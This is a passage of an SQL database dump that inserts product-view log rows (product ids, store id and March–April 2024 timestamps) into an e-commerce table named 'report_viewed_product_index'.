(10225, NULL, NULL, 2059, 1, '2024-03-21 08:06:45'),
(10226, NULL, NULL, 2064, 1, '2024-03-21 08:20:40'),
(10227, NULL, NULL, 2054, 1, '2024-03-21 12:36:28'),
(10228, NULL, NULL, 2058, 1, '2024-03-21 13:45:18'),
(10229, NULL, NULL, 2053, 1, '2024-03-21 14:18:25'),
(10230, NULL, NULL, 2058, 1, '2024-03-21 14:21:36'),
(10231, NULL, NULL, 2060, 1, '2024-03-21 14:51:27'),
(10232, NULL, NULL, 2063, 1, '2024-03-21 15:01:27'),
(10233, NULL, NULL, 2058, 1, '2024-03-21 15:27:56'),
(10234, NULL, NULL, 2060, 1, '2024-03-21 16:09:26'),
(10235, NULL, NULL, 2055, 1, '2024-03-21 16:15:35'),
(10236, NULL, NULL, 2063, 1, '2024-03-21 16:17:29'),
(10237, NULL, NULL, 2058, 1, '2024-03-21 16:39:00'),
(10238, NULL, NULL, 2059, 1, '2024-03-21 17:11:33'),
(10239, NULL, NULL, 2055, 1, '2024-03-21 17:21:36'),
(10240, NULL, NULL, 2058, 1, '2024-03-21 17:47:15'),
(10241, NULL, NULL, 2061, 1, '2024-03-21 18:30:59'),
(10242, NULL, NULL, 2062, 1, '2024-03-21 19:08:11'),
(10243, NULL, NULL, 2054, 1, '2024-03-21 20:24:16'),
(10244, NULL, NULL, 2064, 1, '2024-03-21 20:27:54'),
(10245, NULL, NULL, 2059, 1, '2024-03-21 20:40:26'),
(10246, NULL, NULL, 2064, 1, '2024-03-21 20:53:43'),
(10247, NULL, NULL, 2062, 1, '2024-03-21 22:32:37'),
(10248, NULL, NULL, 2062, 1, '2024-03-22 00:00:11'),
(10249, NULL, NULL, 2059, 1, '2024-03-22 00:55:55'),
(10250, NULL, NULL, 2064, 1, '2024-03-22 01:49:11'),
(10251, NULL, NULL, 2062, 1, '2024-03-22 01:50:27'),
(10252, NULL, NULL, 2053, 1, '2024-03-22 01:51:26'),
(10253, NULL, NULL, 2063, 1, '2024-03-22 01:51:58'),
(10254, NULL, NULL, 2061, 1, '2024-03-22 01:52:19'),
(10255, NULL, NULL, 2059, 1, '2024-03-22 01:52:27'),
(10256, NULL, NULL, 2058, 1, '2024-03-22 01:52:31'),
(10257, NULL, NULL, 2055, 1, '2024-03-22 01:54:20'),
(10258, NULL, NULL, 2054, 1, '2024-03-22 01:54:22'),
(10259, NULL, NULL, 2060, 1, '2024-03-22 01:56:40'),
(10260, NULL, NULL, 2063, 1, '2024-03-22 02:02:35'),
(10261, NULL, NULL, 2064, 1, '2024-03-22 04:51:38'),
(10262, NULL, NULL, 2054, 1, '2024-03-22 05:11:31'),
(10263, NULL, NULL, 2064, 1, '2024-03-22 06:11:04'),
(10264, NULL, NULL, 2064, 1, '2024-03-22 11:19:17'),
(10265, NULL, NULL, 2061, 1, '2024-03-22 21:16:30'),
(10266, NULL, NULL, 2062, 1, '2024-03-22 22:32:36'),
(10267, NULL, NULL, 2064, 1, '2024-03-23 00:50:45'),
(10268, NULL, NULL, 2059, 1, '2024-03-23 09:58:47'),
(10269, NULL, NULL, 2059, 1, '2024-03-23 10:00:10'),
(10270, NULL, NULL, 2059, 1, '2024-03-23 10:00:19'),
(10271, NULL, NULL, 2059, 1, '2024-03-23 14:40:00'),
(10272, NULL, NULL, 2058, 1, '2024-03-23 15:06:40'),
(10273, NULL, NULL, 2053, 1, '2024-03-23 16:13:13'),
(10274, NULL, NULL, 2058, 1, '2024-03-23 20:38:44'),
(10275, NULL, NULL, 2062, 1, '2024-03-23 23:17:55'),
(10276, NULL, NULL, 2058, 1, '2024-03-24 00:44:22'),
(10277, NULL, NULL, 2055, 1, '2024-03-24 01:26:48'),
(10278, NULL, NULL, 2064, 1, '2024-03-24 03:21:51'),
(10279, NULL, NULL, 2064, 1, '2024-03-24 13:17:52'),
(10280, NULL, NULL, 2059, 1, '2024-03-24 15:52:00'),
(10281, NULL, NULL, 2053, 1, '2024-03-24 18:09:54'),
(10282, NULL, NULL, 2064, 1, '2024-03-24 22:14:20'),
(10283, NULL, NULL, 2063, 1, '2024-03-25 05:12:49'),
(10284, NULL, NULL, 2060, 1, '2024-03-25 05:12:49'),
(10285, NULL, NULL, 2058, 1, '2024-03-25 05:12:53'),
(10286, NULL, NULL, 2061, 1, '2024-03-25 05:12:54'),
(10287, NULL, NULL, 2064, 1, '2024-03-25 05:12:55'),
(10288, NULL, NULL, 2054, 1, '2024-03-25 05:12:57'),
(10289, NULL, NULL, 2062, 1, '2024-03-25 05:12:58'),
(10290, NULL, NULL, 2059, 1, '2024-03-25 05:12:59'),
(10291, NULL, NULL, 2055, 1, '2024-03-25 05:13:02'),
(10292, NULL, NULL, 2054, 1, '2024-03-25 05:50:50'),
(10293, NULL, NULL, 2055, 1, '2024-03-25 05:50:51'),
(10294, NULL, NULL, 2064, 1, '2024-03-25 05:50:55'),
(10295, NULL, NULL, 2063, 1, '2024-03-25 05:50:57'),
(10296, NULL, NULL, 2062, 1, '2024-03-25 05:50:58'),
(10297, NULL, NULL, 2060, 1, '2024-03-25 05:50:59'),
(10298, NULL, NULL, 2059, 1, '2024-03-25 05:51:07'),
(10299, NULL, NULL, 2058, 1, '2024-03-25 05:51:08'),
(10300, NULL, NULL, 2061, 1, '2024-03-25 05:51:09'),
(10301, NULL, NULL, 2062, 1, '2024-03-25 12:21:39'),
(10302, NULL, NULL, 2062, 1, '2024-03-25 12:21:40'),
(10303, NULL, NULL, 2064, 1, '2024-03-25 15:40:51'),
(10304, NULL, NULL, 2060, 1, '2024-03-25 19:54:42'),
(10305, NULL, NULL, 2054, 1, '2024-03-25 21:15:11'),
(10306, NULL, NULL, 2055, 1, '2024-03-26 08:39:28'),
(10307, NULL, NULL, 2064, 1, '2024-03-26 08:48:01'),
(10308, NULL, NULL, 2062, 1, '2024-03-26 14:00:04'),
(10309, NULL, NULL, 2054, 1, '2024-03-26 14:34:50'),
(10310, NULL, NULL, 2060, 1, '2024-03-26 16:36:04'),
(10311, NULL, NULL, 2062, 1, '2024-03-26 22:36:04'),
(10312, NULL, NULL, 2063, 1, '2024-03-27 00:28:12'),
(10313, NULL, NULL, 2064, 1, '2024-03-27 04:28:32'),
(10314, NULL, NULL, 2053, 1, '2024-03-27 07:54:27'),
(10315, NULL, NULL, 2063, 1, '2024-03-27 12:16:57'),
(10316, NULL, NULL, 2063, 1, '2024-03-27 20:45:57'),
(10317, NULL, NULL, 2058, 1, '2024-03-27 22:23:37'),
(10318, NULL, NULL, 2064, 1, '2024-03-27 23:34:07'),
(10319, NULL, NULL, 2054, 1, '2024-03-28 00:00:28'),
(10320, NULL, NULL, 2062, 1, '2024-03-28 05:48:10'),
(10321, NULL, NULL, 2064, 1, '2024-03-28 06:23:08'),
(10322, NULL, NULL, 2062, 1, '2024-03-28 07:00:50'),
(10323, NULL, NULL, 2063, 1, '2024-03-28 07:16:07'),
(10324, NULL, NULL, 2054, 1, '2024-03-28 14:23:36'),
(10325, NULL, NULL, 2061, 1, '2024-03-28 14:34:24'),
(10326, NULL, NULL, 2064, 1, '2024-03-28 16:57:09'),
(10327, NULL, NULL, 2054, 1, '2024-03-29 00:19:46'),
(10328, NULL, NULL, 2053, 1, '2024-03-29 02:33:25'),
(10329, NULL, NULL, 2059, 1, '2024-03-29 08:25:43'),
(10330, NULL, NULL, 2054, 1, '2024-03-29 10:15:51'),
(10331, NULL, NULL, 2053, 1, '2024-03-29 10:50:47'),
(10332, NULL, NULL, 2061, 1, '2024-03-29 13:01:25'),
(10333, NULL, NULL, 2061, 1, '2024-03-29 13:01:26'),
(10334, NULL, NULL, 2058, 1, '2024-03-29 13:40:00'),
(10335, NULL, NULL, 2059, 1, '2024-03-29 13:40:01'),
(10336, NULL, NULL, 2063, 1, '2024-03-29 13:40:01'),
(10337, NULL, NULL, 2060, 1, '2024-03-29 13:40:07'),
(10338, NULL, NULL, 2054, 1, '2024-03-29 13:40:10'),
(10339, NULL, NULL, 2062, 1, '2024-03-29 13:40:12'),
(10340, NULL, NULL, 2064, 1, '2024-03-29 13:40:14'),
(10341, NULL, NULL, 2055, 1, '2024-03-29 13:40:16'),
(10342, NULL, NULL, 2061, 1, '2024-03-29 13:40:16'),
(10343, NULL, NULL, 2064, 1, '2024-03-29 16:47:00'),
(10344, NULL, NULL, 2064, 1, '2024-03-29 16:47:04'),
(10345, NULL, NULL, 2064, 1, '2024-03-29 16:47:16'),
(10346, NULL, NULL, 2064, 1, '2024-03-29 16:48:18'),
(10347, NULL, NULL, 2054, 1, '2024-03-29 17:16:10'),
(10348, NULL, NULL, 2061, 1, '2024-03-30 00:11:19'),
(10349, NULL, NULL, 2060, 1, '2024-03-30 09:31:32'),
(10350, NULL, NULL, 2053, 1, '2024-03-30 14:47:59'),
(10351, NULL, NULL, 2060, 1, '2024-03-30 15:55:55'),
(10352, NULL, NULL, 2060, 1, '2024-03-30 16:58:43'),
(10353, NULL, NULL, 2061, 1, '2024-03-30 16:58:45'),
(10354, NULL, NULL, 2063, 1, '2024-03-30 17:16:58'),
(10355, NULL, NULL, 2058, 1, '2024-03-30 18:03:42'),
(10356, NULL, NULL, 2055, 1, '2024-03-30 19:27:27'),
(10357, NULL, NULL, 2060, 1, '2024-03-30 22:45:09'),
(10358, NULL, NULL, 2063, 1, '2024-03-30 22:55:11'),
(10359, NULL, NULL, 2058, 1, '2024-03-30 23:20:46'),
(10360, NULL, NULL, 2055, 1, '2024-03-31 00:05:52'),
(10361, NULL, NULL, 2061, 1, '2024-03-31 01:24:28'),
(10362, NULL, NULL, 2062, 1, '2024-03-31 02:07:49'),
(10363, NULL, NULL, 2054, 1, '2024-03-31 03:19:42'),
(10364, NULL, NULL, 2059, 1, '2024-03-31 03:34:56'),
(10365, NULL, NULL, 2064, 1, '2024-03-31 03:48:12'),
(10366, NULL, NULL, 2054, 1, '2024-03-31 05:47:35'),
(10367, NULL, NULL, 2060, 1, '2024-03-31 08:26:47'),
(10368, NULL, NULL, 2053, 1, '2024-03-31 23:17:18'),
(10369, NULL, NULL, 2064, 1, '2024-04-01 04:37:48'),
(10370, NULL, NULL, 2054, 1, '2024-04-01 11:00:13'),
(10371, NULL, NULL, 2060, 1, '2024-04-01 16:05:58'),
(10372, NULL, NULL, 2058, 1, '2024-04-01 16:16:21'),
(10373, NULL, NULL, 2064, 1, '2024-04-01 17:36:29'),
(10374, NULL, NULL, 2062, 1, '2024-04-02 12:39:46'),
(10375, NULL, NULL, 2061, 1, '2024-04-02 15:51:17'),
(10376, NULL, NULL, 2053, 1, '2024-04-02 23:28:09'),
(10377, NULL, NULL, 2060, 1, '2024-04-03 05:25:35'),
(10378, NULL, NULL, 2063, 1, '2024-04-03 06:11:28'),
(10379, NULL, NULL, 2054, 1, '2024-04-03 19:22:03'),
(10380, NULL, NULL, 2064, 1, '2024-04-04 05:00:37'),
(10381, NULL, NULL, 2055, 1, '2024-04-04 08:32:04'),
(10382, NULL, NULL, 2054, 1, '2024-04-04 13:32:23'),
(10383, NULL, NULL, 2061, 1, '2024-04-04 20:03:43'),
(10384, NULL, NULL, 2062, 1, '2024-04-04 20:57:33'),
(10385, NULL, NULL, 2064, 1, '2024-04-05 08:21:09'),
(10386, NULL, NULL, 2053, 1, '2024-04-05 11:28:55'),
(10387, NULL, NULL, 2064, 1, '2024-04-05 19:56:22'),
(10388, NULL, NULL, 2064, 1, '2024-04-05 21:42:20'),
(10389, NULL, NULL, 2064, 1, '2024-04-05 21:43:28'),
(10390, NULL, NULL, 2064, 1, '2024-04-05 21:43:29'),
(10391, NULL, NULL, 2063, 1, '2024-04-05 21:43:29'),
(10392, NULL, NULL, 2062, 1, '2024-04-05 21:43:30'),
(10393, NULL, NULL, 2061, 1, '2024-04-05 21:43:31'),
(10394, NULL, NULL, 2060, 1, '2024-04-05 21:43:31'),
(10395, NULL, NULL, 2059, 1, '2024-04-05 21:43:39'),
(10396, NULL, NULL, 2058, 1, '2024-04-05 21:43:44'),
(10397, NULL, NULL, 2055, 1, '2024-04-05 21:43:50'),
(10398, NULL, NULL, 2054, 1, '2024-04-05 21:43:54'),
(10399, NULL, NULL, 2054, 1, '2024-04-06 00:48:41'),
(10400, NULL, NULL, 2054, 1, '2024-04-06 02:49:08'),
(10401, NULL, NULL, 2064, 1, '2024-04-06 05:02:14'),
(10402, NULL, NULL, 2053, 1, '2024-04-06 08:18:20'),
(10403, NULL, NULL, 2063, 1, '2024-04-06 08:18:40'),
(10404, NULL, NULL, 2062, 1, '2024-04-06 08:18:44'),
(10405, NULL, NULL, 2060, 1, '2024-04-06 08:18:47'),
(10406, NULL, NULL, 2059, 1, '2024-04-06 08:18:51'),
(10407, NULL, NULL, 2061, 1, '2024-04-06 14:36:45'),
(10408, NULL, NULL, 2055, 1, '2024-04-07 00:49:24'),
(10409, NULL, NULL, 2058, 1, '2024-04-07 00:49:29'),
(10410, NULL, NULL, 2061, 1, '2024-04-07 18:49:41'),
(10411, NULL, NULL, 2055, 1, '2024-04-07 22:48:00'),
(10412, NULL, NULL, 2053, 1, '2024-04-08 04:10:05'),
(10413, NULL, NULL, 2053, 1, '2024-04-08 04:14:45'),
(10414, NULL, NULL, 2054, 1, '2024-04-08 04:17:12'),
(10415, NULL, NULL, 2053, 1, '2024-04-08 04:19:40'),
(10416, NULL, NULL, 2054, 1, '2024-04-08 04:21:54'),
(10417, NULL, NULL, 2055, 1, '2024-04-08 04:24:20'),
(10418, NULL, NULL, 2054, 1, '2024-04-08 04:26:58'),
(10419, NULL, NULL, 2055, 1, '2024-04-08 04:29:08'),
(10420, NULL, NULL, 2053, 1, '2024-04-08 04:38:48'),
(10421, NULL, NULL, 2054, 1, '2024-04-08 04:41:17'),
(10422, NULL, NULL, 2055, 1, '2024-04-08 04:43:44'),
(10423, NULL, NULL, 2064, 1, '2024-04-08 04:54:49'),
(10424, NULL, NULL, 2064, 1, '2024-04-08 04:59:35'),
(10425, NULL, NULL, 2063, 1, '2024-04-08 05:15:20'),
(10426, NULL, NULL, 2063, 1, '2024-04-08 05:20:06'),
(10427, NULL, NULL, 2062, 1, '2024-04-08 05:22:17'),
(10428, NULL, NULL, 2063, 1, '2024-04-08 05:24:31'),
(10429, NULL, NULL, 2062, 1, '2024-04-08 05:27:25'),
(10430, NULL, NULL, 2060, 1, '2024-04-08 05:29:58'),
(10431, NULL, NULL, 2062, 1, '2024-04-08 05:32:08'),
(10432, NULL, NULL, 2060, 1, '2024-04-08 05:34:46'),
(10433, NULL, NULL, 2059, 1, '2024-04-08 05:37:50'),
(10434, NULL, NULL, 2053, 1, '2024-04-08 06:10:20'),
(10435, NULL, NULL, 2058, 1, '2024-04-08 07:59:03'),
(10436, NULL, NULL, 2063, 1, '2024-04-08 09:20:09'),
(10437, NULL, NULL, 2054, 1, '2024-04-08 13:03:18'),
(10438, NULL, NULL, 2058, 1, '2024-04-08 15:46:56'),
(10439, NULL, NULL, 2061, 1, '2024-04-08 17:38:17'),
(10440, NULL, NULL, 2054, 1, '2024-04-08 17:53:31'),
(10441, NULL, NULL, 2060, 1, '2024-04-09 12:47:03'),
(10442, NULL, NULL, 2060, 1, '2024-04-09 12:47:03'),
(10443, NULL, NULL, 2054, 1, '2024-04-09 12:47:06'),
(10444, NULL, NULL, 2054, 1, '2024-04-09 12:47:06'),
(10445, NULL, NULL, 2064, 1, '2024-04-09 12:56:00'),
(10446, NULL, NULL, 2064, 1, '2024-04-09 17:06:35'),
(10447, NULL, NULL, 2061, 1, '2024-04-10 07:07:03'),
(10448, NULL, NULL, 2060, 1, '2024-04-10 12:18:46'),
(10449, NULL, NULL, 2063, 1, '2024-04-10 12:27:00'),
(10450, NULL, NULL, 2058, 1, '2024-04-10 12:49:45'),
(10451, NULL, NULL, 2055, 1, '2024-04-10 13:32:09'),
(10452, NULL, NULL, 2061, 1, '2024-04-10 14:47:45'),
(10453, NULL, NULL, 2062, 1, '2024-04-10 15:27:58'),
(10454, NULL, NULL, 2054, 1, '2024-04-10 16:46:57'),
(10455, NULL, NULL, 2059, 1, '2024-04-10 17:06:50'),
(10456, NULL, NULL, 2064, 1, '2024-04-10 17:24:46'),
(10457, NULL, NULL, 2060, 1, '2024-04-10 19:56:42'),
(10458, NULL, NULL, 2063, 1, '2024-04-10 20:04:26'),
(10459, NULL, NULL, 2058, 1, '2024-04-10 20:25:15'),
(10460, NULL, NULL, 2055, 1, '2024-04-10 21:03:51'),
(10461, NULL, NULL, 2053, 1, '2024-04-10 21:22:00'),
(10462, NULL, NULL, 2061, 1, '2024-04-10 22:12:52'),
(10463, NULL, NULL, 2062, 1, '2024-04-10 22:49:56'),
(10464, NULL, NULL, 2060, 1, '2024-04-10 23:25:56'),
(10465, NULL, NULL, 2054, 1, '2024-04-10 23:44:22'),
(10466, NULL, NULL, 2060, 1, '2024-04-10 23:53:45'),
(10467, NULL, NULL, 2063, 1, '2024-04-11 00:00:47'),
(10468, NULL, NULL, 2058, 1, '2024-04-11 00:21:56'),
(10469, NULL, NULL, 2055, 1, '2024-04-11 00:59:47'),
(10470, NULL, NULL, 2058, 1, '2024-04-11 01:23:40'),
(10471, NULL, NULL, 2061, 1, '2024-04-11 02:07:20'),
(10472, NULL, NULL, 2062, 1, '2024-04-11 02:42:12'),
(10473, NULL, NULL, 2054, 1, '2024-04-11 03:52:38'),
(10474, NULL, NULL, 2059, 1, '2024-04-11 04:11:56'),
(10475, NULL, NULL, 2064, 1, '2024-04-11 04:28:23'),
(10476, NULL, NULL, 2054, 1, '2024-04-11 09:42:36'),
(10477, NULL, NULL, 2064, 1, '2024-04-11 11:28:28'),
(10478, NULL, NULL, 2054, 1, '2024-04-11 12:02:01'),
(10479, NULL, NULL, 2063, 1, '2024-04-11 22:16:33'),
(10480, NULL, NULL, 2054, 1, '2024-04-12 03:55:25'),
(10481, NULL, NULL, 2061, 1, '2024-04-12 09:02:26'),
(10482, NULL, NULL, 2062, 1, '2024-04-12 13:31:02'),
(10483, NULL, NULL, 2054, 1, '2024-04-12 16:36:31'),
(10484, NULL, NULL, 2054, 1, '2024-04-12 17:44:53'),
(10485, NULL, NULL, 2062, 1, '2024-04-12 18:34:19'),
(10486, NULL, NULL, 2063, 1, '2024-04-12 22:25:42'),
(10487, NULL, NULL, 2058, 1, '2024-04-12 23:48:22'),
(10488, NULL, NULL, 2054, 1, '2024-04-13 02:06:58'),
(10489, NULL, NULL, 2055, 1, '2024-04-13 08:14:47'),
(10490, NULL, NULL, 2060, 1, '2024-04-13 09:14:23'),
(10491, NULL, NULL, 2059, 1, '2024-04-13 09:28:23'),
(10492, NULL, NULL, 2054, 1, '2024-04-13 11:48:30'),
(10493, NULL, NULL, 2059, 1, '2024-04-13 13:19:31'),
(10494, NULL, NULL, 2064, 1, '2024-04-13 14:08:54'),
(10495, NULL, NULL, 2059, 1, '2024-04-13 16:01:09'),
(10496, NULL, NULL, 2061, 1, '2024-04-13 16:45:44'),
(10497, NULL, NULL, 2061, 1, '2024-04-13 18:10:18'),
(10498, NULL, NULL, 2062, 1, '2024-04-13 20:34:30'),
(10499, NULL, NULL, 2058, 1, '2024-04-14 00:44:34'),
(10500, NULL, NULL, 2060, 1, '2024-04-14 01:24:28'),
(10501, NULL, NULL, 2060, 1, '2024-04-14 01:44:07'),
(10502, NULL, NULL, 2061, 1, '2024-04-14 16:55:52'),
(10503, NULL, NULL, 2061, 1, '2024-04-14 16:55:59'),
(10504, NULL, NULL, 2059, 1, '2024-04-14 17:48:09'),
(10505, NULL, NULL, 2058, 1, '2024-04-15 12:47:05'),
(10506, NULL, NULL, 2060, 1, '2024-04-15 13:57:33'),
(10507, NULL, NULL, 2061, 1, '2024-04-15 15:08:31'),
(10508, NULL, NULL, 2061, 1, '2024-04-15 18:07:07'),
(10509, NULL, NULL, 2061, 1, '2024-04-15 18:23:27'),
(10510, NULL, NULL, 2060, 1, '2024-04-15 23:19:17'),
(10511, NULL, NULL, 2054, 1, '2024-04-15 23:19:21'),
(10512, NULL, NULL, 2060, 1, '2024-04-15 23:19:25'),
(10513, NULL, NULL, 2054, 1, '2024-04-15 23:19:27'),
(10514, NULL, NULL, 2054, 1, '2024-04-16 01:01:53'),
(10515, NULL, NULL, 2060, 1, '2024-04-16 04:52:54'),
(10516, NULL, NULL, 2054, 1, '2024-04-16 05:09:07'),
(10517, NULL, NULL, 2061, 1, '2024-04-16 06:59:50'),
(10518, NULL, NULL, 2054, 1, '2024-04-16 20:04:40'),
(10519, NULL, NULL, 2062, 1, '2024-04-16 23:47:28'),
(10520, NULL, NULL, 2063, 1, '2024-04-16 23:48:44'),
(10521, NULL, NULL, 2061, 1, '2024-04-17 03:42:25'),
(10522, NULL, NULL, 2054, 1, '2024-04-17 04:22:57'),
(10523, NULL, NULL, 2064, 1, '2024-04-17 18:32:36'),
(10524, NULL, NULL, 2058, 1, '2024-04-17 19:51:28'),
(10525, NULL, NULL, 2059, 1, '2024-04-18 00:13:22'),
(10526, NULL, NULL, 2064, 1, '2024-04-18 18:57:50'),
(10527, NULL, NULL, 2062, 1, '2024-04-18 19:46:48'),
(10528, NULL, NULL, 2063, 1, '2024-04-18 23:38:53'),
(10529, NULL, NULL, 2059, 1, '2024-04-19 01:16:52'),
(10530, NULL, NULL, 2058, 1, '2024-04-19 02:11:10'),
(10531, NULL, NULL, 2055, 1, '2024-04-19 02:11:10'),
(10532, NULL, NULL, 2060, 1, '2024-04-19 02:11:10'),
(10533, NULL, NULL, 2063, 1, '2024-04-19 02:11:10'),
(10534, NULL, NULL, 2054, 1, '2024-04-19 02:11:11'),
(10535, NULL, NULL, 2062, 1, '2024-04-19 02:11:11'),
(10536, NULL, NULL, 2061, 1, '2024-04-19 02:11:10'),
(10537, NULL, NULL, 2059, 1, '2024-04-19 02:11:13'),
(10538, NULL, NULL, 2064, 1, '2024-04-19 02:11:14'),
(10539, NULL, NULL, 2053, 1, '2024-04-19 06:38:28'),
(10540, NULL, NULL, 2059, 1, '2024-04-19 08:03:26'),
(10541, NULL, NULL, 2062, 1, '2024-04-19 08:33:07'),
(10542, NULL, NULL, 2055, 1, '2024-04-19 10:05:53'),
(10543, NULL, NULL, 2064, 1, '2024-04-19 18:40:41'),
(10544, NULL, NULL, 2054, 1, '2024-04-19 20:05:47'),
(10545, NULL, NULL, 2063, 1, '2024-04-20 05:39:44'),
(10546, NULL, NULL, 2054, 1, '2024-04-20 05:47:00'),
(10547, NULL, NULL, 2062, 1, '2024-04-20 07:00:53'),
(10548, NULL, NULL, 2063, 1, '2024-04-20 11:26:57'),
(10549, NULL, NULL, 2054, 1, '2024-04-20 12:07:51'),
(10550, NULL, NULL, 2063, 1, '2024-04-20 14:45:26'),
(10551, NULL, NULL, 2063, 1, '2024-04-20 14:56:22'),
(10552, NULL, NULL, 2054, 1, '2024-04-21 00:46:45'),
(10553, NULL, NULL, 2063, 1, '2024-04-21 02:33:20'),
(10554, NULL, NULL, 2054, 1, '2024-04-21 05:38:38'),
(10555, NULL, NULL, 2054, 1, '2024-04-21 09:38:02'),
(10556, NULL, NULL, 2054, 1, '2024-04-21 11:38:58'),
(10557, NULL, NULL, 2063, 1, '2024-04-21 12:15:11'),
(10558, NULL, NULL, 2059, 1, '2024-04-21 14:15:35'),
(10559, NULL, NULL, 2054, 1, '2024-04-21 18:14:33'),
(10560, NULL, NULL, 2064, 1, '2024-04-21 20:52:37'),
(10561, NULL, NULL, 2063, 1, '2024-04-21 20:55:36'),
(10562, NULL, NULL, 2055, 1, '2024-04-21 22:53:55'),
(10563, NULL, NULL, 2062, 1, '2024-04-22 02:00:51'),
(10564, NULL, NULL, 2063, 1, '2024-04-22 02:57:07'),
(10565, NULL, NULL, 2060, 1, '2024-04-22 05:58:14'),
(10566, NULL, NULL, 2063, 1, '2024-04-22 06:11:30'),
(10567, NULL, NULL, 2058, 1, '2024-04-22 06:46:53'),
(10568, NULL, NULL, 2054, 1, '2024-04-22 06:53:41'),
(10569, NULL, NULL, 2055, 1, '2024-04-22 07:49:11'),
(10570, NULL, NULL, 2061, 1, '2024-04-22 09:26:07'),
(10571, NULL, NULL, 2062, 1, '2024-04-22 10:08:27'),
(10572, NULL, NULL, 2061, 1, '2024-04-22 10:20:49'),
(10573, NULL, NULL, 2054, 1, '2024-04-22 11:30:58'),
(10574, NULL, NULL, 2059, 1, '2024-04-22 11:49:50'),
(10575, NULL, NULL, 2054, 1, '2024-04-22 12:02:56'),
(10576, NULL, NULL, 2064, 1, '2024-04-22 12:05:51'),
(10577, NULL, NULL, 2058, 1, '2024-04-22 13:21:15'),
(10578, NULL, NULL, 2064, 1, '2024-04-22 14:31:52'),
(10579, NULL, NULL, 2064, 1, '2024-04-22 14:45:08'),
(10580, NULL, NULL, 2063, 1, '2024-04-22 15:16:51'),
(10581, NULL, NULL, 2054, 1, '2024-04-22 17:43:36'),
(10582, NULL, NULL, 2053, 1, '2024-04-23 07:15:38'),
(10583, NULL, NULL, 2054, 1, '2024-04-23 12:51:53'),
(10584, NULL, NULL, 2063, 1, '2024-04-23 14:16:09'),
(10585, NULL, NULL, 2062, 1, '2024-04-23 15:48:34'),
(10586, NULL, NULL, 2064, 1, '2024-04-23 18:48:18'),
(10587, NULL, NULL, 2061, 1, '2024-04-23 23:21:55'),
(10588, NULL, NULL, 2054, 1, '2024-04-24 03:06:50'),
(10589, NULL, NULL, 2054, 1, '2024-04-24 06:52:42'),
(10590, NULL, NULL, 2059, 1, '2024-04-24 06:52:45'),
(10591, NULL, NULL, 2061, 1, '2024-04-24 06:52:49'),
(10592, NULL, NULL, 2058, 1, '2024-04-24 06:52:52'),
(10593, NULL, NULL, 2059, 1, '2024-04-24 08:00:06'),
(10594, NULL, NULL, 2059, 1, '2024-04-24 08:00:12'),
(10595, NULL, NULL, 2059, 1, '2024-04-24 08:00:13'),
(10596, NULL, NULL, 2054, 1, '2024-04-24 08:15:44'),
(10597, NULL, NULL, 2054, 1, '2024-04-24 11:31:35'),
(10598, NULL, NULL, 2062, 1, '2024-04-24 13:06:14'),
(10599, NULL, NULL, 2060, 1, '2024-04-24 13:06:15'),
(10600, NULL, NULL, 2054, 1, '2024-04-24 13:06:21'),
(10601, NULL, NULL, 2058, 1, '2024-04-24 13:06:25'),
(10602, NULL, NULL, 2064, 1, '2024-04-24 13:06:25'),
(10603, NULL, NULL, 2063, 1, '2024-04-24 13:06:28'),
(10604, NULL, NULL, 2061, 1, '2024-04-24 13:06:34'),
(10605, NULL, NULL, 2055, 1, '2024-04-24 13:06:34'),
(10606, NULL, NULL, 2059, 1, '2024-04-24 13:06:36'),
(10607, NULL, NULL, 2053, 1, '2024-04-24 16:10:06'),
(10608, NULL, NULL, 2053, 1, '2024-04-24 17:14:19'),
(10609, NULL, NULL, 2061, 1, '2024-04-25 00:39:03'),
(10610, NULL, NULL, 2063, 1, '2024-04-25 01:25:22'),
(10611, NULL, NULL, 2054, 1, '2024-04-25 09:23:30'),
(10612, NULL, NULL, 2062, 1, '2024-04-25 10:02:14'),
(10613, NULL, NULL, 2059, 1, '2024-04-25 11:01:22'),
(10614, NULL, NULL, 2059, 1, '2024-04-25 13:18:09'),
(10615, NULL, NULL, 2054, 1, '2024-04-25 17:22:27'),
(10616, NULL, NULL, 2063, 1, '2024-04-25 19:26:22'),
(10617, NULL, NULL, 2054, 1, '2024-04-26 00:31:06'),
(10618, NULL, NULL, 2060, 1, '2024-04-26 09:24:52'),
(10619, NULL, NULL, 2060, 1, '2024-04-26 09:48:35'),
(10620, NULL, NULL, 2055, 1, '2024-04-26 10:19:32'),
(10621, NULL, NULL, 2064, 1, '2024-04-26 10:19:36'),
(10622, NULL, NULL, 2061, 1, '2024-04-26 10:19:39'),
(10623, NULL, NULL, 2058, 1, '2024-04-26 10:19:42'),
(10624, NULL, NULL, 2063, 1, '2024-04-26 14:25:42');
INSERT INTO `report_viewed_product_index` (`index_id`, `visitor_id`, `customer_id`, `product_id`, `store_id`, `added_at`) VALUES
(10625, NULL, NULL, 2063, 1, '2024-04-26 14:25:44'),
(10626, NULL, NULL, 2063, 1, '2024-04-26 14:27:18'),
(10627, NULL, NULL, 2054, 1, '2024-04-26 17:41:29'),
(10628, NULL, NULL, 2062, 1, '2024-04-26 17:57:31'),
(10629, NULL, NULL, 2060, 1, '2024-04-26 23:05:53'),
(10630, NULL, NULL, 2053, 1, '2024-04-26 23:14:18'),
(10631, NULL, NULL, 2063, 1, '2024-04-27 01:00:48'),
(10632, NULL, NULL, 2062, 1, '2024-04-27 03:02:36'),
(10633, NULL, NULL, 2060, 1, '2024-04-27 05:27:26'),
(10634, NULL, NULL, 2063, 1, '2024-04-27 10:04:27'),
(10635, NULL, NULL, 2060, 1, '2024-04-27 19:35:20'),
(10636, NULL, NULL, 2054, 1, '2024-04-27 21:03:30'),
(10637, NULL, NULL, 2054, 1, '2024-04-27 22:47:31'),
(10638, NULL, NULL, 2061, 1, '2024-04-28 04:57:35'),
(10639, NULL, NULL, 2054, 1, '2024-04-28 06:27:25'),
(10640, NULL, NULL, 2060, 1, '2024-04-28 07:55:55'),
(10641, NULL, NULL, 2061, 1, '2024-04-28 13:09:34'),
(10642, NULL, NULL, 2054, 1, '2024-04-28 17:09:51'),
(10643, NULL, NULL, 2062, 1, '2024-04-28 18:42:05'),
(10644, NULL, NULL, 2064, 1, '2024-04-28 23:02:56'),
(10645, NULL, NULL, 2058, 1, '2024-04-29 02:03:09'),
(10646, NULL, NULL, 2063, 1, '2024-04-29 03:42:07'),
(10647, NULL, NULL, 2061, 1, '2024-04-29 03:42:18'),
(10648, NULL, NULL, 2055, 1, '2024-04-29 03:42:27'),
(10649, NULL, NULL, 2064, 1, '2024-04-29 03:42:34'),
(10650, NULL, NULL, 2060, 1, '2024-04-29 03:42:41'),
